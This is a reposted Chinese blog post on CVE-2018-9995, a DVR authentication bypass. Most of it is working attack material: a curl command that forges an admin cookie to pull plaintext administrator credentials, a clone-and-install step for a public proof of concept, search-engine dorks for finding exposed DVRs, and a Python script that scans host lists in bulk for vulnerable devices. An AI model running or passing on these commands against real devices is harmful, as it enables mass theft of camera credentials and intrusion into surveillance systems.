###漏洞描述

此漏洞允許攻擊者通過修改“Cookie: uid=admin” 之后訪問特定 DVR 的控制面板，返回此設備的明文管理員憑證。

###漏洞利用

1.利用代碼

curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

2.poc利用

https://github.com/ezelf/CVE-2018-9995_dvr_credentials
git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git

cd CVE-2018-9995_dvr_credentials

pip install -r requirements.txt

###關鍵詞搜索

1. zoomeye:

keyword: “/login.rsp"

2.shodan:

keyword:html:"/login.rsp"

keyword:"server:GNU rsp/1.0"

3.google:

keyword:intitle:"DVR login"

###批量驗證

DVR系列攝像頭批量檢測使用方法:python CVE-2018-9995_check.py host.txt
其中host.txt內容可以為8.8.8.8:8080或者www.baidu.com，腳本運行后對使用了DVR系列攝像頭的host會保存到result.txt文件里

#author:hzkey

import tableprint as tp

import sys

import requests

import re

class Colors:

    GREEN = '\033[32m'

    RED = '\033[0;31m'

    BLUE = '\033[*]'

    ORANGE = '\033[33m'

def check_host(host):

    try:

        print(Colors.ORANGE+"Checking : %s"%host)

        url = 'http://' + host+'/login.rsp'

        rr= requests.get(url,timeout=30,allow_redirects=False)

        if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):

            print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)

            ff=open('result.txt','a+')

            ff.write('%s\n'%(url))

    except:

        pass

if __name__ == '__main__':

    if len(sys.argv) < 2:

        print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt

host.txt:127.0.0.1:8080 or baidu.com

""")

    if len(sys.argv) >= 2:

        file = open(sys.argv[1])

        for i in file:

            i = i.strip()

            check_host(i)

        file.close()

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 DVR登錄繞過漏洞_CVE-2018-9995漏洞復現 SSH登陸驗證繞過漏洞（cve-2018-10933） Nuxeo 認證繞過和RCE漏洞分析（CVE-2018-16341) Apache Tomcat安全繞過漏洞（CVE-2018-1305） [身份驗證繞過]CVE-2018-10933 (漏洞復現) CVE-2018-16509 GhostScript 沙箱繞過（命令執行）漏洞 Zabbix登錄繞過漏洞復現（CVE-2022-23131） cve-2018-4878漏洞復現 uWSGI 漏洞復現（CVE-2018-7490） CVE-2018-18955漏洞學習